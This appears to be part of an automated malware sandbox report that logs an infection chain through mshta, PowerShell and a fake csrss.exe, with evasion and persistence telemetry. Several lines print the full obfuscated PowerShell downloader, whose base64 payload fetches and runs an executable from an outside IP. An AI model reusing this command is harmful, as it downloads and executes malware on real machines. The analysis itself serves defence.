                        Source: Binary string: q7C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.pdb source: powershell.exe, 00000003.00000002.1354721983.0000000005559000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: easinvoker.pdbGCTL source: csrss.exe, 0000000C.00000003.1284464034.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1297030622.0000000002D70000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1357966873.000000007EFE0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1297030622.0000000002DC3000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1284975349.000000000088B000.00000004.00000020.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000002.1552868362.0000000000890000.00000040.00000400.00020000.00000000.sdmp
                        Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 4nHrKBXqqqVJFZFp.exe, 00000014.00000002.3626732569.00000000009BF000.00000002.00000001.01000000.0000000F.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000016.00000000.1622712741.00000000009BF000.00000002.00000001.01000000.0000000F.sdmp

                        Data Obfuscation

                        Source: C:\Users\user\Links\iaoqralA.pif Unpacked PE file: 17.2.iaoqralA.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;
                        Source: Yara match File source: 12.2.csrss.exe.3800000.3.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 12.2.csrss.exe.2856178.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 12.2.csrss.exe.2856178.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0000000C.00000002.1289661885.0000000002856000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'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'+[cHaR]0x22+'))')))"
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'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'+[cHaR]0x22+'))')))"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))"
                        Source: C:\Windows\SysWOW64\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/C POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'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'+[cHaR]0x22+'))')))"
                        Source: iaoqralA.pif.12.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline"
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_03813F9C LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary, 12_2_03813F9C
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_07A11B75 pushad ; iretd 3_2_07A11B89
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_0380C39A push 0380C7F2h; ret 12_2_0380C7EA
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_0381539C push 038153D4h; ret 12_2_038153CC
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_0380634E push 03806392h; ret 12_2_0380638A
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_03806350 push 03806392h; ret 12_2_0380638A
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_038272AC push 03827317h; ret 12_2_0382730F
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_03803210 push eax; ret 12_2_0380324C
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_038271F8 push 03827288h; ret 12_2_03827280
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_03814100 push 03814138h; ret 12_2_03814130
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_03827144 push 038271ECh; ret 12_2_038271E4
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_038270AC push 03827125h; ret 12_2_0382711D
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_038130AE push 0381315Bh; ret 12_2_03813153
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_038130B0 push 0381315Bh; ret 12_2_03813153
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_0380F7D3 push 0380F821h; ret 12_2_0380F819
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_0380F7D4 push 0380F821h; ret 12_2_0380F819
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_0380F6C8 push 0380F73Eh; ret 12_2_0380F736
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_0380C66C push 0380C7F2h; ret 12_2_0380C7EA
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_038125E4 push ecx; mov dword ptr [esp], edx 12_2_038125E6
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_03817484 push 038174BCh; ret 12_2_038174B4
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_0381AA00 push ecx; mov dword ptr [esp], edx 12_2_0381AA05
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_0381AA64 push ecx; mov dword ptr [esp], edx 12_2_0381AA69
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_03805F82 push 03805FDFh; ret 12_2_03805FD7
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_03805F84 push 03805FDFh; ret 12_2_03805FD7
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_0380CFB4 push 0380CFE0h; ret 12_2_0380CFD8
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_0380BFEC push ecx; mov dword ptr [esp], edx 12_2_0380BFF1
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_03813EBC push 03813EFEh; ret 12_2_03813EF6
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_03825DF4 push 03825FEEh; ret 12_2_03825FE6
                        Source: C:\Users\user\Links\iaoqralA.pif Code function: 17_2_0040A0DF push edx; retf 17_2_0040A0E0
                        Source: C:\Users\user\Links\iaoqralA.pif Code function: 17_2_0040114B push ecx; retf 17_2_0040114C
                        Source: C:\Users\user\Links\iaoqralA.pif Code function: 17_2_00401978 pushfd ; retf 17_2_0040197C
                        Source: C:\Users\user\Links\iaoqralA.pif Code function: 17_2_00414A67 push ecx; retf 17_2_00414A77

                        Persistence and Installation Behavior

                        Source: C:\Users\user\AppData\Roaming\csrss.exe File created: C:\Users\user\Links\iaoqralA.pif
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\csrss.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csrss[1].exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.dll

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\AppData\Roaming\csrss.exe Code function: 12_2_038178FC GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 12_2_038178FC
                        Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\csrss.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\systeminfo.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: C:\Users\user\AppData\Roaming\csrss.exe; Memory allocated: 3800000 memory commit 500064256
                        Source: C:\Users\user\AppData\Roaming\csrss.exe; Memory allocated: 3801000 memory commit 500154368
                        Source: C:\Users\user\AppData\Roaming\csrss.exe; Memory allocated: 3827000 memory commit 500002816
                        Source: C:\Users\user\AppData\Roaming\csrss.exe; Memory allocated: 3828000 memory commit 500047872
                        Source: C:\Users\user\AppData\Roaming\csrss.exe; Memory allocated: 3833000 memory commit 500015104
                        Source: C:\Users\user\AppData\Roaming\csrss.exe; Memory allocated: 3837000 memory commit 500006912
                        Source: C:\Users\user\AppData\Roaming\csrss.exe; Memory allocated: 3838000 memory commit 500015104
                        Source: C:\Windows\SysWOW64\systeminfo.exe; API/Special instruction interceptor: Address: 7FFCC372D324
                        Source: C:\Windows\SysWOW64\systeminfo.exe; API/Special instruction interceptor: Address: 7FFCC372D7E4
                        Source: C:\Windows\SysWOW64\systeminfo.exe; API/Special instruction interceptor: Address: 7FFCC372D944
                        Source: C:\Windows\SysWOW64\systeminfo.exe; API/Special instruction interceptor: Address: 7FFCC372D504
                        Source: C:\Windows\SysWOW64\systeminfo.exe; API/Special instruction interceptor: Address: 7FFCC372D544
                        Source: C:\Windows\SysWOW64\systeminfo.exe; API/Special instruction interceptor: Address: 7FFCC372D1E4
                        Source: C:\Windows\SysWOW64\systeminfo.exe; API/Special instruction interceptor: Address: 7FFCC3730154
                        Source: C:\Windows\SysWOW64\systeminfo.exe; API/Special instruction interceptor: Address: 7FFCC372DA44
                        Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30CFD1C0 rdtsc 17_2_30CFD1C0
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\mshta.exe; Window / User API: threadDelayed 9987
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 7115
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 2473
                        Source: C:\Windows\SysWOW64\systeminfo.exe; Window / User API: threadDelayed 2575
                        Source: C:\Windows\SysWOW64\systeminfo.exe; Window / User API: threadDelayed 7398
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.dll
                        Source: C:\Users\user\Links\iaoqralA.pif; API coverage: 0.9 %
                        Source: C:\Windows\SysWOW64\systeminfo.exe; API coverage: 3.1 %
                        Source: C:\Windows\SysWOW64\mshta.exe TID: 4804; Thread sleep count: 9987 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4476; Thread sleep count: 7115 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5340; Thread sleep count: 2473 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5896; Thread sleep time: -7378697629483816s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7172; Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7780; Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\SysWOW64\systeminfo.exe TID: 8180; Thread sleep count: 2575 > 30
                        Source: C:\Windows\SysWOW64\systeminfo.exe TID: 8180; Thread sleep time: -5150000s >= -30000s
                        Source: C:\Windows\SysWOW64\systeminfo.exe TID: 8180; Thread sleep count: 7398 > 30
                        Source: C:\Windows\SysWOW64\systeminfo.exe TID: 8180; Thread sleep time: -14796000s >= -30000s
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe TID: 6156; Thread sleep time: -80000s >= -30000s
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe TID: 6156; Thread sleep count: 40 > 30
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe TID: 6156; Thread sleep time: -40000s >= -30000s
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe TID: 6156; Thread sleep time: -45000s >= -30000s
